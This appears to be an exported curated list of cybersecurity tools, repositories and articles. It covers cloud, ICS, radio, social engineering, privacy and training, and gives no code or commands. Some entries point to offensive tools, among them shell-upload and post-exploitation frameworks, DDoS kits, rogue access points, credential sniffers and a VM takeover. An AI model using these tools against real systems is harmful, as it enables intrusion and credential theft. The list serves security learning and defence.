badPods | 599 | over 2 years ago | : A collection of manifests that will create pods with elevated privileges |
carbon-black-cloud-sdk-python | 40 | 7 days ago | VMware Carbon Black Cloud Python SDK |
Baserunner | 205 | about 2 years ago | : A tool for exploring Firebase datastores |
A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next | |||
Cloud Native Computing Foundation | : The CNCF hosts critical components of the global technology infrastructure | ||
Checkov | 7,149 | about 16 hours ago | is a static code analysis tool for infrastructure-as-code |
KICS | 2,099 | 1 day ago | stands for Keeping Infrastructure as Code Secure; it is open source and a must-have for any cloud native project. It finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in the following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available |
10 real-world stories of how we’ve compromised CI/CD pipelines | |||
GitHub Action Runners | , Analyzing the Environment and Security in Action | ||
CSIRT / Mobile / GCP/Google | |||
gcp dhcp takeover code exec | 533 | over 3 years ago | : Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent |
New research: How effective is basic account hygiene at preventing hijacking | |||
CSIRT / Mobile / Azure | |||
SimuLand | 703 | over 1 year ago | : Understand adversary tradecraft and improve detection strategies |
Azure-Readiness-Checklist | 495 | almost 2 years ago | : This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important! |
Preventing Exposed Azure Blob Storage | |||
Open Azure blobs search on grayhatwarfare.com and other updates | |||
ChaosDB | : is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB | ||
Introducing Project Freta | : Toward trusted sensing for the cloud | ||
Finding Azurescape | : Cross-Account Container Takeover in Azure Container Instances | ||
Malicious KQL Query | Azure Monitor: | ||
CSIRT / Mobile / AWS | |||
git-secrets | 12,442 | 7 months ago | : Prevents you from committing secrets and credentials into git repositories |
CloudMapper | 6,006 | 4 months ago | : CloudMapper helps you analyze your Amazon Web Services (AWS) environments |
Security Monkey | 4,357 | almost 4 years ago | : Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time |
my-arsenal-of-aws-security-tools | 8,983 | 25 days ago | : List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc |
RKMS | 43 | almost 6 years ago | : RKMS is a highly available key management service, built on top of AWS's KMS |
FireProx | 1,925 | over 1 year ago | : AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation |
AWS IAM privileges as found using the AWS Policy Generator described at | |||
Sadcloud | 659 | about 1 year ago | : A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure |
Endgame | : Creating | ||
Bucky | 190 | almost 3 years ago | : An automatic S3 bucket discovery tool |
Prowler | 10,867 | about 4 hours ago | : Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness |
barq | 386 | about 2 years ago | : The AWS Cloud Post Exploitation framework! |
Text → AWS IAM Policy | : Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy | ||
CSIRT / Risk Assessment and Vulnerability Management | |||
Cyber Risk Management | (PT-BR) | ||
RITA (Real Intelligence Threat Analytics) | 2,509 | 4 months ago | |
Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash | by grugq | ||
ISO27001 audit in real-time.... | |||
Gearing Towards Your Next Audit | : Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards | ||
Nuclei | 20,687 | 7 days ago | is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. : Community curated list of templates for the nuclei engine to find a security vulnerability in application |
CSIRT / Risk Assessment and Vulnerability Management / Nuclei | |||
Nuclei unleashed - writing first exploit | |||
CSIRT / Risk Assessment and Vulnerability Management | |||
Secure design principles | |||
Risk Assessment of GitHub Copilot | |||
ISA/IEC 62443 | |||
Understanding IEC 62443 | |||
NERC CIP | |||
Threat Modeling Manifesto | |||
hcltm | 401 | 3 months ago | : Documenting your Threat Models with HCL |
Risk Management Framework for Systems and Organizations Introductory Course | |||
CSIRT / Risk Assessment and Vulnerability Management / Guidelines | |||
NIST Special Publication 800-63B: Digital Identity Guidelines | |||
Easy Ways to Build a Better P@$5w0rd | |||
Time for Password Expiration to Die | |||
Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events | |||
CSIRT / ICS (SCADA) | |||
GRASSMARLIN | 941 | over 4 years ago | : Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments |
ATT&CK® for Industrial Control Systems | |||
THE RACE TO NATIVE CODE EXECUTION IN PLCS | |||
The Top 20 Secure PLC Coding Practices Project | |||
CSIRT / ICS (SCADA) / Synchrophasor | |||
IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems | |||
Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements | |||
IEEE C37.118 protocol | |||
IEEE C37.118 Synchrophasor Protocol | wireshark wiki | ||
CSIRT / ICS (SCADA) | |||
INFRA:HALT | : Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices | ||
Findings From Examining More Than a Decade of Public ICS/OT Exploits | |||
The Top 20 Secure PLC Coding Practices Project | |||
Conpot | 1,243 | 9 months ago | : ICS/SCADA honeypot |
Hello_Proto | 9 | over 3 years ago | : "Banner Grabbing" in industrial environments |
CSIRT / Radio | |||
Qualcomm chain-of-trust | |||
Presenting QCSuper | : a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones | ||
Logitech keyboards and mice vulnerable to extensive cyber attacks | |||
A look at GSM | |||
The gr-gsm project | 1,346 | 11 months ago | : Gnuradio blocks and tools for receiving GSM transmissions |
srsLTE | 3,484 | 5 months ago | : Open source SDR LTE software suite from Software Radio Systems (SRS) |
List of software-defined radios | |||
Spectrum Analyzers, Linux | |||
CSIRT / Radio / Spectrum Analyzers, Linux | |||
Sonic Visualiser | : | ||
spek | |||
SpectMorph | : is a free software project for analyzing samples of musical instruments and combining them (morphing) | ||
CSIRT / Radio | |||
The LibreCellular project | aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware | ||
RFSec-ToolKit | 1,565 | 6 months ago | is a collection of Radio Frequency Communication Protocol Hacktools |
CSIRT / Radio / Satellite | |||
How Do I Crack Satellite and Cable Pay TV? (33c3) | |||
CSIRT / Radio / Satellite / How Do I Crack Satellite and Cable Pay TV? (33c3) | |||
Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream. | 19 | over 8 years ago | |
Process QPSK-demodulated data into transport stream (SCTE 55-1) | 21 | over 8 years ago | |
CSIRT / Social Engineering | |||
Cartero | 171 | over 4 years ago | : Social Engineering Framework |
The Basics of Social Engineering | by Chris Pritchard at DEF CON 27. Books suggested: | ||
CSIRT / Social Engineering / The Basics of Social Engineering | |||
Never Split the Difference | Chris Voss | ||
The Charisma Myth | Olivia Fox Cabane | ||
Hacking the Human | Ian Mann | ||
The Art Of Social Engineering | Chris Hadnagy | ||
What Everybody is Saying | Joe Navarro | ||
CSIRT / Social Engineering | |||
The Social-Engineer Toolkit (SET) | 11,000 | about 1 month ago | : repository from TrustedSec - All new versions of SET will be deployed here |
CSIRT / Tools | |||
Network Security Monitoring on Raspberry Pi type devices | 779 | almost 7 years ago | |
A secure, shared workspace for secrets | 614 | almost 6 years ago | |
bettercap | 16,771 | 6 days ago | , the Swiss army knife for network attacks and monitoring |
Quijote | 47 | almost 4 years ago | is a highly configurable HTTP middleware for API security |
Tool Analysis Result Sheet | 345 | almost 7 years ago | and , via by jpcertcc |
EKOLABS | 51 | about 2 years ago | tools repo |
Vapor PwnedPasswords Provider | : Package for testing a password against Pwned Passwords V2 API in Vapor | ||
Is my password pwned? | 151 | almost 4 years ago | , |
XPoCe | XPC snooping utilities for macOS and iOS (version 2.0) | ||
Enterprise Password Quality Checking | 158 | almost 2 years ago | using any hash data sources (HaveIBeenPwned lists, et al) |
DockerAttack | 278 | over 6 years ago | : Various Tools and Docker Images |
PyREBox | 1,654 | 9 months ago | is a Python scriptable Reverse Engineering sandbox |
find3 | 4,653 | almost 2 years ago | : High-precision indoor positioning framework, version 3 |
structured-text-tools | 6,981 | 3 months ago | : A list of command line tools for manipulating structured text data |
telnetlogger | 238 | over 7 years ago | : Simulates enough of a Telnet connection in order to log failed login attempts |
vault | 31,217 | 7 days ago | : A tool for secrets management, encryption as a service, and privileged access management |
WeakNet LINUX 8 | : This is an information-security themed distribution that has been in development since 2010 | ||
HiTB | : It was a part of HackTheBox platform | ||
arphid | 34 | over 6 years ago | : DIY 125KHz RFID read/write/emulate guide |
Pybelt | 511 | over 6 years ago | : The hacker's tool belt |
mhax | 30 | over 6 years ago | |
U2F Support Firefox Extension | 197 | about 7 years ago | |
git-bug | 8,148 | 11 days ago | : Distributed bug tracker embedded in Git |
mkcert | 50,197 | 3 months ago | : A simple zero-config tool to make locally trusted development certificates with any names you'd like |
trackerjacker | 2,636 | 10 months ago | : Like nmap for mapping wifi networks you're not connected to, plus device tracking |
Polymorph | 461 | 10 months ago | is a real-time network packet manipulation framework with support for almost all existing protocols |
query_huawei_wifi_router | 13 | over 3 years ago | : A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc |
kravatte | 15 | almost 6 years ago | : Implementation of Kravatte Encryption Suite |
noisy | 1,691 | 12 months ago | : Simple random DNS, HTTP/S internet traffic noise generator |
PatternAnalyzer | 12 | over 4 years ago | : The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use |
Google Chromium | 20,774 | 8 days ago | , sans integration with Google |
Gammux | 54 | over 5 years ago | : A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images |
openvotenetwork | : Implementation of anonymous in go | ||
put2win | 125 | over 4 years ago | : Script to automate shell upload via the HTTP PUT method to get Meterpreter |
Tools by Morphus Labs | |||
Stratosphere IPS | |||
Convert nmap Scans into Beautiful HTML Pages | |||
NMapGUI | 468 | over 4 years ago | : Advanced Graphical User Interface for NMap |
GeoInt | |||
python-nubia | 1,591 | over 2 years ago | : A command-line and interactive shell framework |
nipe | 1,954 | 3 months ago | : is a script to make the Tor network your default gateway |
fuxploider | 3,050 | over 1 year ago | : File upload vulnerability scanner and exploitation tool |
solo | 2,310 | about 2 years ago | : FIDO2 USB+NFC token optimized for security, extensibility, and style |
Joint Report On Publicly Available Hacking Tools | : by Canadian Centre for Cyber Security | ||
APTSimulator | 2,470 | over 1 year ago | : A toolset to make a system look as if it was the victim of an APT attack |
debugger-netwalker | 7 | about 7 years ago | : NetWalker Debugger |
USB armory | 1,372 | 24 days ago | : |
Bashfuscator | 1,660 | about 1 year ago | : A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team |
Big List of Naughty Strings | 46,208 | 7 months ago | |
Netflix Cloud Security SIRT releases Diffy | : A Differencing Engine for Digital Forensics in the Cloud - | ||
Command-Line Snippets | : A place to share useful, one-line commands that make your life easier | ||
IP-to-ASN - Team Cymru | |||
4nonimizer | 620 | almost 3 years ago | : A bash script for anonymizing the public IP used to browse the Internet, managing the connection to the Tor network and to different VPN providers (OpenVPN) |
free Entropy Service | |||
Correct Horse Battery Staple | : Secure password generator to help keep you safer online | ||
CorrectHorse | 2 | about 8 years ago | : random secure password generator |
XKCD-password-generator | 1,325 | 5 months ago | : Generate secure multiword passwords/passphrases, inspired by XKCD |
Using a Hardened Container Image for Secure Applications in the Cloud | |||
freedomfighting | 403 | over 1 year ago | : A collection of scripts which may come in handy during your freedom fighting activities |
Machine Learning and Security | 1,979 | about 2 years ago | : Source code about machine learning and security |
octofairy | 14 | almost 6 years ago | : A machine learning based GitHub bot for Issues |
kbd-audio | 8,545 | almost 2 years ago | : Tools for capturing and analysing keyboard input paired with microphone capture |
certstreamcatcher | 81 | almost 6 years ago | : This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks |
Wifiphisher | 13,314 | 11 months ago | : is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing |
chezmoi | 13,411 | 5 days ago | : Manage your dotfiles securely across multiple machines |
hexyl | 9,166 | 24 days ago | : A command-line hex viewer |
Giggity | 126 | over 1 year ago | : Wraps github api for openly available information about an organization, user, or repo |
howmanypeoplearearound | 6,919 | 3 months ago | : Count the number of people around you by monitoring wifi signals |
LASCAR | 376 | about 1 year ago | : Ledger's Advanced Side-Channel Analysis Repository |
Hostintel | : A Modular Python Application To Collect Intelligence For Malicious Hosts - | ||
DarkNet_ChineseTrading | 1,067 | over 1 year ago | |
mXtract | 582 | about 3 years ago | : Memory Extractor & Analyzer |
commando-vm | 6,960 | about 2 months ago | : a fully customized, Windows-based security distribution for penetration testing and red teaming |
CSIRT / Tools / commando-vm | |||
commando packages | 6,960 | about 2 months ago | |
CSIRT / Tools | |||
Introducing Inkdrop 4 | |||
AntiCheat-Testing-Framework | 791 | over 2 years ago | : Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal) |
how we uncovered an attack on government entities in Europe | IronPython, darkly: | ||
inlets | : Expose your local endpoints to the Internet | ||
papers | 5 | 2 months ago | Papers released by the Intelstorm Team |
Pwnagotchi | 7,750 | 3 months ago | : (⌐■_■) - Deep Reinforcement Learning vs WiFi |
spyse.py | 269 | over 4 years ago | : Python API wrapper and command-line client for the tools hosted on spyse.com |
Cloning a MAC address to bypass a captive portal | |||
Open Steno Project | was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry | ||
Machine Learning on Encrypted Data Without Decrypting It | |||
0bin | 1,378 | over 3 years ago | : Client side encrypted pastebin |
Raspberry Pi as a poor man's hardware hacking tool | |||
usbkill | 4,442 | 9 months ago | : is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer |
gs-transfer | 24 | over 3 years ago | : Secure File Transfer via Global Socket Bounce Network |
CORE | 683 | about 2 months ago | : The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines |
VoightKampff | : Beating Google ReCaptcha and the funCaptcha using AWS Rekognition | ||
John the Ripper in the cloud | : John the Ripper jumbo supports hundreds of hash and cipher types | ||
SpamCop | is the premier service for reporting spam | ||
vector-edk | 132 | over 9 years ago | : EFI Development Kit |
H1R0GH057 | 1,838 | over 1 year ago | : tools (DDoS, lulz, etc..) |
gatekeeper | 1,341 | about 2 months ago | : First open-source DDoS protection system |
uriDeep | 95 | almost 3 years ago | : Unicode encoding attacks with machine learning |
Rawsec's CyberSecurity Inventory | : | ||
gaijin tools | |||
Lord Of The Strings (LOTS) | 9 | over 4 years ago | : String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives) |
Unit 42 Public Tools Repo | 709 | about 2 years ago | : Listing of tools released by Palo Alto Networks Threat Intelligence team |
glsnip | 109 | almost 3 years ago | : copy and paste across machines |
CERTrating | is the first tool to assess the Maturity Level of CERTs and their services. News: | ||
Cybersecurity Maturity Model Certification (CMMC) | |||
What is the Cybersecurity Maturity Model Certification (CMMC) | |||
Who needs to have Cybersecurity Maturity Model Certification (CMMC) | |||
Security Tools | : Most of the links listed here go to the original sites | ||
Find Virtual Hosts for Any IP Address | |||
ngrok | 24,183 | 7 months ago | : Introspected tunnels to localhost |
cppngrok | 8 | over 3 years ago | : a cpp wrapper for ngrok (WIP) |
Pybull | 31 | over 2 years ago | : Contains some cool python projects. It is 100% python coded. Have fun see_no_evil |
dfss | 5 | about 8 years ago | : Daemon for sense of security. Shutdown or reboot your computer, like a " " |
Gamifying machine learning for stronger security and AI models | : : An experimentation and research platform to investigate the interaction of automated agents in abstract simulated network environments | ||
BashScan | : is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap | ||
python-libnessus | 25 | almost 2 years ago | : Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful |
NFIQ2 | 132 | about 2 months ago | : Biometric fingerprint image quality assessment tool |
Beta | 245 | about 1 year ago | : Beta versions of Didier Stevens's software |
MaxMind ASN Importer | 3 | over 1 year ago | : This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows |
SubSeven is Back | : The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required | ||
Detect It Easy | 7,631 | 5 days ago | : Program for determining types of files for Windows, Linux and MacOS |
Ronin | is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filtering IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, installing 3rd-party repositories of exploits and/or payloads, running exploits, writing new exploits, managing local databases, fuzzing data, and much more | ||
CSIRT / Tools / Note-taking | |||
Awesome note-taking apps for hackers! | 347 | almost 4 years ago | |
SwiftnessX | 889 | almost 2 years ago | : A cross-platform note-taking & target-tracking app for penetration testers |
cherrytree | : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file | ||
trilium (https://github.com/zadam/trilium) | 27,370 | 4 months ago | : Build your personal knowledge base with Trilium Notes |
obsidian | : is a powerful knowledge base that works on top of a local folder of plain text Markdown files | ||
CudaText | , | ||
marktext | 47,398 | 3 months ago | : A simple and elegant markdown editor, available for Linux, macOS and Windows |
helix | 33,775 | 9 days ago | : A post-modern modal text editor |
Compare AsciiDoc and Markdown | |||
CSIRT / Tools / Kali | |||
hurl | 72 | about 7 years ago | : hexadecimal & URL encoder + decoder. hURL is a small utility that can encode and decode between multiple formats |
Kali Tools | |||
CSIRT / Tools / IP Reputation | |||
IP Reputation Check | |||
IP & Domain Reputation Center | |||
CSIRT / Tools / Shell tools | |||
Python-Scripts | 172 | 10 days ago | : some scripts for penetration testing |
SubEnum | 329 | about 1 year ago | : bash script for Subdomain Enumeration |
password-store | : Simple password manager using gpg and ordinary unix directories | ||
CSIRT / Tools / Search Engines | |||
DarkSearch | : | ||
Search engines for Hackers | : | ||
CSIRT / Tools / Search Engines / Search engines for Hackers | |||
censys.io | |||
shodan.io | |||
CSIRT / Tools / Search Engines / Search engines for Hackers / shodan.io | |||
TriOp | : Tool for quickly gathering statistical information from Shodan.io | ||
CSIRT / Tools / Search Engines / Search engines for Hackers | |||
viz.greynoise.io | |||
zoomeye.org | |||
wigle.net | |||
publicwww.com | |||
hunter.io | |||
haveibeenpwned.com | |||
haveibeenEMOTET | |||
thispersondoesnotexist.com | |||
osintframework.com | |||
NAPALM FTP Indexer | lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members | ||
CSIRT / Tools / Search Engines | |||
Insecam | : Network live IP video cameras directory | ||
CSIRT / Tools / VPN | |||
jigsaw project | by Alphabet/Google. : VPN Server | ||
SSHuttle | 11,787 | 22 days ago | : Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling |
WireGuard | : is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache | ||
Crockford’s base 32 encoding | : Crockford’s base 32 encoding is a compromise between efficiency and human legibility | ||
Sputnik | -An Open Source Intelligence Browser Extension | ||
PCredz | 2,013 | about 2 months ago | : This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface |
uncaptcha2 | 4,959 | almost 6 years ago | : defeating the latest version of ReCaptcha with 91% accuracy |
Nefarious LinkedIn | 824 | almost 6 years ago | : A look at how LinkedIn spies on its users |
ProtonVPN-CLI | : Linux command-line client for ProtonVPN. Written in Python | ||
Nebula | 14,583 | 7 days ago | : A scalable overlay networking tool with a focus on performance, simplicity and security |
AirVPN | A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship | ||
Build your own private WireGuard VPN with PiVPN | |||
CSIRT / Tools / Secure Sharing | |||
CryFS | : Keep your data safe in the cloud | ||
Cryptomator | : Multi-platform transparent client-side encryption of your files in the cloud | ||
VeraCrypt | : is a free open source disk encryption software for Windows, Mac OSX and Linux | ||
CipherShed | : is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs) | ||
Boxcryptor | : Security for your Cloud | ||
Nextcloud E2E | 31 | 15 days ago | : End-to-end encryption RFC. Some old news |
DiskCryptor | is an open encryption solution that offers encryption of all disk partitions, including the system partition | ||
ProjectSend | 1,411 | about 2 months ago | is free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports client groups, system user roles, statistics, multiple languages, detailed logs... and much more! |
send | 13,263 | over 3 years ago | Mozilla : Simple, private file sharing from the makers of Firefox (archived). Revival: |
CSIRT / Privacy | |||
Device and Data Access when Personal Safety is At Risk | Apple: | ||
Everything Old is New Part 2: Why Online Anonymity Matters | |||
Data Security on Mobile Devices | : Current State of the Art, Open Problems, and Proposed Solutions | ||
Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response. | |||
TorBox Wireless Manager | |||
Anyone can use this powerful facial-recognition tool — and that's a problem | |||
The Instagram ads Facebook won't show you | |||
Yggdrasil | 3,649 | 5 days ago | : An experiment in scalable routing as an encrypted IPv6 overlay network |
Receiving sensitive information about any Dodo pizzeria | 24 | over 3 years ago | |
4TB of stolen identities are being circulated online following a breach on Oriflame | |||
Using “Master Faces” to Bypass Face-Recognition Authenticating Systems | , , two | ||
apollo | 1,372 | about 1 year ago | : A Unix-style personal search engine and web crawler for your digital footprint |
Forensic Methodology Report: How to catch NSO Group’s Pegasus | |||
Who is being monitored? | : Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored? | ||
How to choose a browser for everyday use? | , and | ||
TrackerControl | 31 | over 1 year ago | : monitor and control trackers and ads |
Disinformation guru “Hacker X” names his employer: NaturalNews.com | |||
Hey Siri, Find My Ex | : Tech-Enabled Abuse in the Apple Ecosystem | ||
Keyhole Imaging | |||
Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared | |||
Global Presence of Authoritarian Tech | |||
Zooming in on Zero-click Exploits | |||
CSIRT / General | |||
Explain Shell | |||
Examples of regular expressions | |||
A tcpdump Tutorial and Primer with Examples | |||
Capture WiFi / WLAN / 802.11 Probe Request with tcpdump | |||
A curated list of awesome Threat Intelligence resources | 8,127 | 3 months ago | |
Looking for value in EV Certificates | |||
How to find hidden cameras | |||
the Simple Encrypted Arithmetic Library (SEAL) | 225 | over 5 years ago | : This repository is a fork of Microsoft Research's homomorphic encryption implementation |
Cupcake | 408 | about 1 year ago | : A Rust library for lattice-based additive homomorphic encryption |
Our latest updates on Fully Homomorphic Encryption | |||
A port of ChibiOS to the Orchard radio platform | 11 | about 9 years ago | |
Decent Security | : Everyone can be secure | ||
Introducing Certificate Transparency and Nimbus | |||
trillian | 3,553 | 7 days ago | : Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees |
CFSSL's CA trust store repository | 258 | 18 days ago | |
A Few Thoughts on Cryptographic Engineering | |||
Mailfence | |||
Threat Hunting Workshop - Methodologies for Threat Analysis | |||
Xoodoo | 32 | almost 3 years ago | |
CoPilot | is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings | ||
AgentMaps | 918 | 2 months ago | : Make social simulations on interactive maps with Javascript! |
flowsscripts | 1 | over 6 years ago | : Miner pools ips |
SwiftFilter | 403 | over 4 years ago | : Exchange Transport rules to detect and enable response to phishing |
The Illustrated TLS Connection | : Every Byte Explained and | ||
Practical Cryptography | |||
Thieves and Geeks: Russian and Chinese Hacking Communities | |||
ephemera-miscellany | 396 | over 6 years ago | : Ephemera and other documentation associated with the 1337list project |
CleverHans | 6,202 | 8 months ago | : An adversarial example library for constructing attacks, building defenses, and benchmarking both |
HTTP/3 Explained | / - | ||
security | 64 | almost 7 years ago | : Discussion area for security aspects of ECMAScript |
Template for Data Protection Impact Assessment (DPIA) | |||
hash collisions | 1,475 | almost 2 years ago | exploitation and other , a |
Shodan - A tool for Security and Market Research | |||
Engineering Security | : general book about a range of topics in security | ||
Information security posters of the Russian Army (Плакаты по информационной безопасности Российской армии) | (ru) : Russian counter-information posters | ||
Kerberos (I) | : How does Kerberos work? – Theory | ||
Vulncode-DB project | 575 | almost 3 years ago | : The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available |
One-End Encryption (OEE) | 196 | almost 2 years ago | : Stronger than End-to-End Encryption |
Automatic SSL with Now and Let's Encrypt | |||
Hacking Digital Calipers | |||
Binary Hardening in IoT products | : Last year, the team at CITL looked into the state of binary hardening features in IoT firmware | ||
ZigDiggity | 261 | about 3 years ago | : A ZigBee hacking toolkit by Bishop Fox |
Bolstering Security with Cyber Intelligence | |||
Resources-for-Beginner-Bug-Bounty-Hunters | 10,777 | 4 months ago | : A list of resources for those interested in getting started in bug bounties |
THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS | |||
Explanatory Report to the Additional Protocol to the Convention on Cybercrime | |||
PAN-OS GlobalProtect Portal Scanner | 123 | 5 months ago | : Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface |
Thomas Roccia's #100DaysOfCode challenge | : IDA Pro and a lot of other things | ||
Audi A7 2014 MMI Mishandles the Format-string Specifiers | |||
BoF + Sockets + Encoding Errors with Python3 | (pt-br) | ||
Yet another SIP003 plugin for shadowsocks, based on v2ray | 2,699 | 20 days ago | : A SIP003 plugin based on v2ray |
Information Security related Mind Maps | |||
List of Rainbow Tables | |||
Do you hear what I hear? A cyberattack. | : CyLab’s Yang Cai is turning network traffic data into music | ||
Ghost in the ethernet optic | : A few months ago I stumbled on a tweet pointing out a kind of SFP optic that claimed to be smart, made by the Russian company Plumspace | ||
CSIRT / General / Configs | |||
Kali-Customizations | 4 | about 5 years ago | |
CSIRT / Resources | |||
13 Best New Software Security Books To Read In 2021 | |||
pwn.college | is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect” | ||
pwnable.kr | is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. The main purpose of pwnable.kr is 'fun' | ||
Pwnable.tw | is a wargame site for hackers to test and expand their binary exploiting skills | ||
Security Zines | : graphical way of learning concepts of Application & Web Security | ||
CSIRT / Resources / Training and Certifications | |||
OSWE | 567 | over 2 years ago | : OSWE Preparation |
AWAE/OSWE | : Preparation for coming AWAE Training | ||
AWAE-PREP | 859 | over 3 years ago | : This repository will serve as the "master" repo containing all trainings and tutorials done in preparation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses |
offsec_WE | 38 | about 5 years ago | : learning case to prepare OSWE |
AWAE-Preparation | 236 | about 5 years ago | : This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE |
From AWAE to OSWE: The Preparation Guide | |||
Awesome Infosec | 5,207 | 9 months ago | : A curated list of awesome infosec courses and training resources |
Security Certification Progress Chart | |||
study material used for the 2018 CISSP exam | 555 | almost 4 years ago | , |
JustTryHarder | 796 | almost 2 years ago | : a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings) |
Hacking Your Pen Testing / Red Teaming Career: Part 1 | |||
PentesterAcademy | : Courses and Online Labs | ||
OSCE-exam-practice | 56 | over 4 years ago | , |
RED TEAM Operator: Malware Development Essentials Course | and | ||
OSCP Journey | |||
Hacking Dojo | |||
Learning from your mistakes as an offensive security professional | |||
Burp Suite Academy | |||
The Ultimate List of SANS Cheat Sheets | |||
Posters: Pen Testing | |||
#OSCP exam advice thread. | |||
Targeted Malware Reverse Engineering Workshop | |||
OpenSecurity | : We do quality pentests, security engineering, security training and we ♥ OpenSource | ||
OPSEC: In Theory and Practice | : Learn OPSEC through historical examples. This introductory course covers OPSEC concepts, theory, and application. You will learn how to critically assess security advice, and how to differentiate between good and bad OPSEC | ||
opsec | 96 | over 3 years ago | : Counter Surveillance and OPSEC research |
Guide-CEH-Practical-Master | 1,209 | about 1 year ago | |
Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etc. | |||
Free Incident Response Training Plan | and . : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk | ||
CyberDefenders | is a training platform focused on the defensive side of cybersecurity, aiming to provide a place for blue teams to practice, validate the skills they have, and acquire the ones they need | ||
OSCP: My path to the promised land | (pt-br) | ||
psylinux | 18 | about 3 years ago | |
How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt | |||
SOC Core Skills w/ John Strand | |||
awesome-cyber-skills | 3,672 | 5 months ago | : A curated list of hacking environments where you can train your cyber skills legally and safely |
CSIRT / Resources / Conferences and Slides | |||
H2HC | Hackers To Hackers Conference: | ||
CSIRT / Resources / Conferences and Slides / H2HC | |||
H2HC 2017 | 48 | almost 7 years ago | : H2HC 2017 Slides/Materials/Presentations |
H2HC 2018 | 36 | almost 4 years ago | : Slides/Materials/Presentations |
